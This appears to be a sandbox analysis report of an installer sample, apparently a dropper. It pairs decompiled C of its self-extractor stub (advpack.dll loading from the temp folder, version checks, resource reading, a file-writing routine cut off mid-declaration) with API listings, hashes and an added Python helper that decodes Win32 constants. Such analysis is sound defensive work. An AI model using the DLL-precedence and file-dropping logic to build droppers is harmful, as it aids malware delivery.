			E00196495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;          /* 0x104-byte (MAX_PATH) path buffer */
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				/* Appears to be the MSVC /GS stack cookie: global cookie XOR'd with ESP,
				   stored in _v8 and re-checked in the epilogue helper E00196CE0 below. */
				_t9 =  *0x198004; // 0x21bd9a3c
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				/* Build "<extraction temp dir>\advpack.dll" in the local buffer
				   (E00191781 appears to copy, E0019658A appears to append). */
				E00191781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E0019658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				/* 0xffffffff = INVALID_FILE_ATTRIBUTES, 0x10 = FILE_ATTRIBUTE_DIRECTORY:
				   if no such file exists in the temp directory, fall back to loading
				   advpack.dll by name through the normal DLL search order ... */
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					/* ... otherwise load the copy found in the temp directory by full path,
					   flag 8 = LOAD_WITH_ALTERED_SEARCH_PATH, so a DLL dropped next to the
					   extracted payload takes precedence over the system copy. */
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00196CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 001964DF
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 001964F9
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00196502
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                                                    • API String ID: 438848745-3856989675
                                                                                                                                                                                                                                    • Opcode ID: dfebab35828415285b7a659aa2b4b5f72ceb405460e54c4e393259c53b742bd3
                                                                                                                                                                                                                                    • Instruction ID: 1b1b190312282f7867755e7f3490e78cc6d0dbc47be8dcd7756cca186eabc65c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfebab35828415285b7a659aa2b4b5f72ceb405460e54c4e393259c53b742bd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF01A970504108ABEF54EB64DC45EEE7778EF65310F9101A6F589921D0DF70AECACA61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                    						if(E00192773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
								continue;
							} else {
								goto L19;
							}
						} else {
							_t79 = _v44;
							_t88 = _t106;
							_v28 =  *((intOrPtr*)(_t79 + 0xc));
							_t101 = _v28;
							_v48 =  *((intOrPtr*)(_t79 + 8));
							_t83 = _v8 + _v16 + _v24 + 0x94;
							_t97 = _v48;
							_v36 = _t83;
							_t109 = _t83;
							do {
								 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00192A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
								 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00192A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
								_t109 = _t109 + 0x18;
								_t88 = _t88 + 4;
							} while (_t88 < 8);
							_t87 = _v20;
							_t106 = 0;
							if(_v56 < 0 || _v64 > 0) {
								if(_v52 < _t106 || _v60 > _t106) {
									GlobalUnlock(_t103);
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						}
					}
				}
			}
			goto L20;
		}
	}
	L20:
	 *_a8 = _t87;
	if(_t103 != 0) {
		GlobalFree(_t103);
	}
	return _t106;
}

APIs
• GlobalFree.KERNEL32 ref: 00192A6F
  • Part of subcall function 00192773: CharUpperA.USER32(21BD9A3C,00000000,00000000,00000000), ref: 001927A8
  • Part of subcall function 00192773: CharNextA.USER32(0000054D), ref: 001927B5
  • Part of subcall function 00192773: CharNextA.USER32(00000000), ref: 001927BC
  • Part of subcall function 00192773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192829
  • Part of subcall function 00192773: RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192852
  • Part of subcall function 00192773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192870
  • Part of subcall function 00192773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001928A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00193938,?,?,?,?,-00000005), ref: 00192958
• GlobalLock.KERNEL32 ref: 00192969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00193938,?,?,?,?,-00000005,?), ref: 00192A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00192A81
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID:
• API String ID: 3949799724-0
• Opcode ID: ba34eecbc7afc9b190afc9c2d04ba146be162621f266c27e23bc252632efe4ee
• Instruction ID: 2e0a72bc6dbf1277f2a85ea1b17a3739f35c55ab4b5de390ddb490477cd803ca
• Opcode Fuzzy Hash: ba34eecbc7afc9b190afc9c2d04ba146be162621f266c27e23bc252632efe4ee
• Instruction Fuzzy Hash: 69510932E00219EFCF25DF98D884AAEBBB5FF48700F14416AE915E3611DB319941DB95
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 32%
			/* Reads the "FINISHMSG" resource through E0019468F (the FindResourceA/
			 * SizeofResource/LoadResource wrapper listed under APIs below: called
			 * once with a NULL buffer to obtain the size, then again to fill the
			 * buffer) and shows it through E001944B9, the LoadStringA/MessageBoxA
			 * wrapper, unless the text is "<None>". Decompiler temporaries are
			 * renamed; the undefined _t3 in the raw output is the size held in
			 * _t20, and the _push() sequences are folded back into the calls. */
			E00194169(void* __eflags) {
				int size;      /* _t20: resource length from the size-only call */
				char* buf;     /* _t21 */

				size = E0019468F("FINISHMSG", 0, 0);
				buf = (char*)LocalAlloc(0x40 /* LPTR = LMEM_FIXED | LMEM_ZEROINIT */, 4 + size * 4);
				if(buf == 0) {
					/* allocation failed: string table entry 0x4b5, MB_ICONERROR (0x10) */
					return E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
				}
				if(E0019468F("FINISHMSG", buf, size) == 0) {
					/* resource not found: string 0x4b1, MB_ICONERROR */
					E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
				} else if(lstrcmpA(buf, "<None>") != 0) {
					/* string 0x3e9 with the message text as third argument, MB_ICONINFORMATION (0x40) */
					E001944B9(0, 0x3e9, buf, 0, 0x40, 0);
				}
				return LocalFree(buf);
			}


APIs
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001930B4), ref: 00194189
• LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001930B4), ref: 001941E7
  • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
  • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$FINISHMSG
• API String ID: 3507850446-3091758298
• Opcode ID: 00c04cfa6fedd07f7584ec08dc56fa9b5f118888a2758b83917f23dfae42eb57
• Instruction ID: 7b561dfdcfffcd5c47064f09ef00293bd7d6dee048bbb07cf8e23c8018414ca1
• Opcode Fuzzy Hash: 00c04cfa6fedd07f7584ec08dc56fa9b5f118888a2758b83917f23dfae42eb57
• Instruction Fuzzy Hash: 9401F4F17002143BFF2826694C86F7B218EDFE5795F554136B705E26809B68EC8241B5
Uniqueness
Uniqueness Score: -1.00%
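The two APIs listings above (the one for the App Paths lookup in subcall 00192773 and the one for E00194169) record every argument as a raw hex value, so the registry hive, access mask, allocation flags, resource type and message-box style have to be looked up by hand. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the listing's format and annotates the arguments whose meaning is fixed by the Win32 API. The sample lines are copied from the listings above; the decoder tables are deliberately partial, and any value they do not cover stays in hex.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed input: API lines copied from the two listings in the report.
SAMPLE_LISTING = """\
• Part of subcall function 00192773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\\Microsoft\\Windows\\CurrentVersion\\App Paths), ref: 00192829
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00193938,?,?,?,?,-00000005), ref: 00192958
• Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001930B4), ref: 00194189
• Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
• GlobalFree.KERNEL32 ref: 00192A6F
"""

LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{1,8}$")

# Win32 constants; composite values are listed before the bits they contain.
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"),
              (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
              (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"),
              (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
GMEM = [(0x42, "GHND"), (0x2, "GMEM_MOVEABLE"), (0x40, "GMEM_ZEROINIT")]
LMEM = [(0x40, "LPTR"), (0x2, "LMEM_MOVEABLE")]
RT_TYPES = {2: "RT_BITMAP", 3: "RT_ICON", 4: "RT_MENU", 5: "RT_DIALOG", 6: "RT_STRING",
            10: "RT_RCDATA", 14: "RT_GROUP_ICON", 16: "RT_VERSION", 24: "RT_MANIFEST"}
MB_BUTTONS = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE", 3: "MB_YESNOCANCEL",
              4: "MB_YESNO", 5: "MB_RETRYCANCEL"}
MB_ICONS = {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION", 0x30: "MB_ICONWARNING",
            0x40: "MB_ICONINFORMATION"}
MB_OTHER = [(0x1000, "MB_SYSTEMMODAL"), (0x2000, "MB_TASKMODAL"),
            (0x10000, "MB_SETFOREGROUND"), (0x40000, "MB_TOPMOST")]


def decode_flags(value: int, table: List[Tuple[int, str]], zero: str = "0") -> str:
    """Greedy bit-mask decode; bits no table entry explains are reported in hex."""
    if value == 0:
        return zero
    names, rest = [], value
    for mask, name in table:
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return "|".join(names)


def decode_mb(value: int) -> str:
    # MessageBox uType: buttons in the low nibble, icon in the next, modifiers above.
    parts = [MB_BUTTONS.get(value & 0xF, hex(value & 0xF))]
    if value & 0xF0:
        parts.append(MB_ICONS.get(value & 0xF0, hex(value & 0xF0)))
    if value & ~0xFF:
        parts.append(decode_flags(value & ~0xFF, MB_OTHER))
    return "|".join(parts)


# (API name, zero-based argument index) -> decoder for that argument.
DECODERS: Dict[Tuple[str, int], Callable[[int], str]] = {
    ("RegOpenKeyExA", 0): lambda v: HKEYS.get(v, hex(v)),
    ("RegOpenKeyExA", 3): lambda v: decode_flags(v, KEY_ACCESS),
    ("GlobalAlloc", 0): lambda v: decode_flags(v, GMEM, zero="GMEM_FIXED"),
    ("LocalAlloc", 0): lambda v: decode_flags(v, LMEM, zero="LMEM_FIXED"),
    ("FindResourceA", 2): lambda v: RT_TYPES.get(v, hex(v)),
    ("MessageBoxA", 3): decode_mb,
}


def parse_arg(token: str):
    # '?' is an unresolved argument; hex tokens become 32-bit ints; anything else is a string.
    token = token.strip()
    if token == "?":
        return None
    if HEX_RE.match(token):
        return int(token, 16) & 0xFFFFFFFF  # '-00000005' is a two's-complement -5
    return token


def decode_listing(text: str) -> List[Dict]:
    """Parse every API line and attach decoded names for the arguments we know."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [] if m.group("args") is None else [parse_arg(a) for a in m.group("args").split(",")]
        decoded = {i: DECODERS[(m.group("api"), i)](a) for i, a in enumerate(args)
                   if isinstance(a, int) and (m.group("api"), i) in DECODERS}
        calls.append({"api": m.group("api"), "module": m.group("mod"), "subcall": m.group("sub"),
                      "ref": int(m.group("ref"), 16), "args": args, "decoded": decoded})
    return calls


def summarize(text: str) -> List[str]:
    """One line per call, e.g. 'RegOpenKeyExA@00192829: arg0=HKEY_LOCAL_MACHINE, arg3=KEY_READ'."""
    out = []
    for c in decode_listing(text):
        notes = ", ".join(f"arg{i}={v}" for i, v in sorted(c["decoded"].items()))
        out.append(f"{c['api']}@{c['ref']:08X}: {notes or 'no decoded constants'}")
    return out
```

Calling `summarize(SAMPLE_LISTING)` shows the App Paths key being opened under HKEY_LOCAL_MACHINE with KEY_READ, the resource lookups asking for RT_RCDATA, GlobalAlloc using GHND (moveable, zero-initialised), LocalAlloc using LPTR, and the error box raised with MB_OK|MB_ICONERROR|MB_SETFOREGROUND. To cover more of a report, add (API, argument index) entries to DECODERS; unknown APIs and unresolved `?` arguments pass through untouched.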

C-Code - Quality: 100%
			E00197155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                    				_t23 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0x198004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x198004 = _t39;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                                                    				 *0x198008 = _t37;
                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                    			}












APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00197182
• GetCurrentProcessId.KERNEL32 ref: 00197191
• GetCurrentThreadId.KERNEL32 ref: 0019719A
• GetTickCount.KERNEL32 ref: 001971A3
• QueryPerformanceCounter.KERNEL32(?), ref: 001971B8
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: cbcdaa773d80c876ef1f9840025aede471313302bf91353aa3ec6321c44da2f3
• Instruction ID: fe4ba4862c864260d79502892c4425756013fd21de76cfec620b8242911d4263
• Opcode Fuzzy Hash: cbcdaa773d80c876ef1f9840025aede471313302bf91353aa3ec6321c44da2f3
• Instruction Fuzzy Hash: 18111C71D15208DFCF10DFB8DA48A9EBBF4EF48315FA54866E805E7250EB309A45CB45
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E001919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
	signed int _v8;
	char _v520;
	void* __esi;
	signed int _t11;
	void* _t14;
	void* _t23;
	void* _t27;
	void* _t33;
	struct HWND__* _t34;
	signed int _t35;

	_t33 = __edi;
	_t27 = __ebx;
	_t11 =  *0x198004; // 0x21bd9a3c
	_v8 = _t11 ^ _t35;
	_t34 = _a4;
	_t14 = _a8 - 0x110;
	if(_t14 == 0) {
		_t32 = GetDesktopWindow();
		E001943D0(_t34, _t15);
		_v520 = 0;
		LoadStringA( *0x199a3c, _a16,  &_v520, 0x200);
		SetDlgItemTextA(_t34, 0x83f,  &_v520);
		MessageBeep(0xffffffff);
		goto L6;
	} else {
		if(_t14 != 1) {
			L4:
			_t23 = 0;
		} else {
			_t32 = _a12;
			if(_t32 - 0x83d > 1) {
				goto L4;
			} else {
				EndDialog(_t34, _t32);
				L6:
				_t23 = 1;
			}
		}
	}
	return E00196CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
}
                                                                                                                                                                                                                                    0x00191a20
                                                                                                                                                                                                                                    0x00191a08
                                                                                                                                                                                                                                    0x00191a08
                                                                                                                                                                                                                                    0x00191a14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191a16
                                                                                                                                                                                                                                    0x00191a18
                                                                                                                                                                                                                                    0x00191a70
                                                                                                                                                                                                                                    0x00191a72
                                                                                                                                                                                                                                    0x00191a72
                                                                                                                                                                                                                                    0x00191a14
                                                                                                                                                                                                                                    0x00191a06
                                                                                                                                                                                                                                    0x00191a81

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00191A18
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00191A24
                                                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00191A4F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00191A62
                                                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00191A6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                                                    • Opcode ID: 4a8111b8a41db25a23f2c7693a4c6a909e7432cda3c195bc4e9bdf1d463e7e47
                                                                                                                                                                                                                                    • Instruction ID: c0aade9cb5f0e9720dfc6daaee1a619c4a1b2c869d3ff69f6d67d1c13939963e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a8111b8a41db25a23f2c7693a4c6a909e7432cda3c195bc4e9bdf1d463e7e47
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11A13160115AAFDF10EF68ED08AAE77B8EF49300F508166F91293590DB30AE85CBD5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			// Drops one embedded file: builds "<IXP temp dir>\<name>" and writes _a4 bytes from _a16 into it.
                                                                                                                                                                                                                                    			// Parameters as used below: _a4 = byte count, _a12 = file name, _a16 = pointer to the file bytes.
                                                                                                                                                                                                                                    			E001963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                    				signed int _v8;            // stack-cookie copy
                                                                                                                                                                                                                                    				char _v268;                // path buffer, 0x104 (MAX_PATH) bytes
                                                                                                                                                                                                                                    				long _v272;                // bytes actually written
                                                                                                                                                                                                                                    				void* _v276;               // copy of _a16 (data pointer)
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
